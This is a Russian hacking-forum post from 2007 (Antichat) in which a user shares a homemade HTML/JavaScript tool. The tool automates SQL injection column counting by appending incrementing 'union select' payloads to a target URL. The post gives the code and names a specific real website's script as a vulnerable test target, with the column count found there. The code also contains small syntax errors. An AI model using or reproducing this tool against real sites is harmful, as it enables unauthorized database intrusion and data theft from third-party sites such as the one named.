ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
Перезагрузить страницу Javascript-автоматизация поиска колич. колонок
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

Javascript-автоматизация поиска колич. колонок
  #1  
Старый 16.08.2007, 14:00
Аватар для -=lebed=-
-=lebed=-
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287

Репутация: 4738


Post Javascript-автоматизация поиска колич. колонок
Вот написал для себя (за пару часов) небольшой скриптик автоматизации sql-inj для определения колличества колонок. Я конечно понимаю, что дорабатывать его можно очень много, поэтому прошу строго не судить, тем более на javascript я кодер никакой
Цитата:
(выделил специально для inv, чтоб не стебался понапрасну. прим. автора)
, а предлагать усовершенствования и показать недостатки т.п. Главное он пашет!

Итак версия alpha 0.01
PHP код:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251" />
<title>Подборщик колличества столбцов</title>
</head>

<script>
var url="http://";
var tek_url=url;
var s="";
var n=0;
function poisk(f) {
        tek_url=document.search.url.value;
        document.search.colum.value="?";
        document.search.tek_url.value=document.search.url.value+"-1+union+select+";
        tek_url=document.search.url.value+"-1+union+select+";
      
      while (n<50)
      {
      n++;
      if (n==1) {s=s+n;}
      else {s=s+","+n;}
      tek_url=tek_url+s+"/*";
      document.search.tek_url.value=tek_url;
      document.search.colum.value=n;      
      changePage(tek_url);
      pause ();
      
      }
}
function changePage(p) {
        document.getElementById"ifrm" ).src p;
     }




</script>
<form name=search method=post>
  <label>Ведите путь до уязвимого скрпта
  <input name="url" value="http://" size=160%>
  </label><br>
  <input onClick=poisk(search); type=button value="Подобрать число столбцов" name=calculateit>
  <input readonly size=5 name=colum><br>
  текущее значение<input name=tek_url size=180readonly>
</form>
<body onload="changePage()">
    <iframe id="ifrm" src="" width="100%" height="500%"/>
  </body>

</html
Затестить можно так:
Вводим путь до уязвимого скрипта:
Код:
http://sololiteratura.com/php/autor.php?id=
Жмякаем пимпу подобрать колличество столбцов, видим ошибку, жмякаем ещё, снова ошибка, ещё раз! Опс! Вот и наша скуля... число столбцов = 3.
Последний раз редактировалось -=lebed=-; 16.08.2007 в 17:07..
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
JavaScript: «оружие» хакеров Isis Мировые новости 3 20.04.2007 19:28
Основы JavaScript .Slip Авторские статьи 20 16.05.2006 23:44
Books JS FRAGNATIC PHP, PERL, MySQL, JavaScript 0 11.08.2005 16:57
Bypassing JavaScript Filters the Flash! Attack k00p3r Чужие Статьи 0 12.07.2005 16:11



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ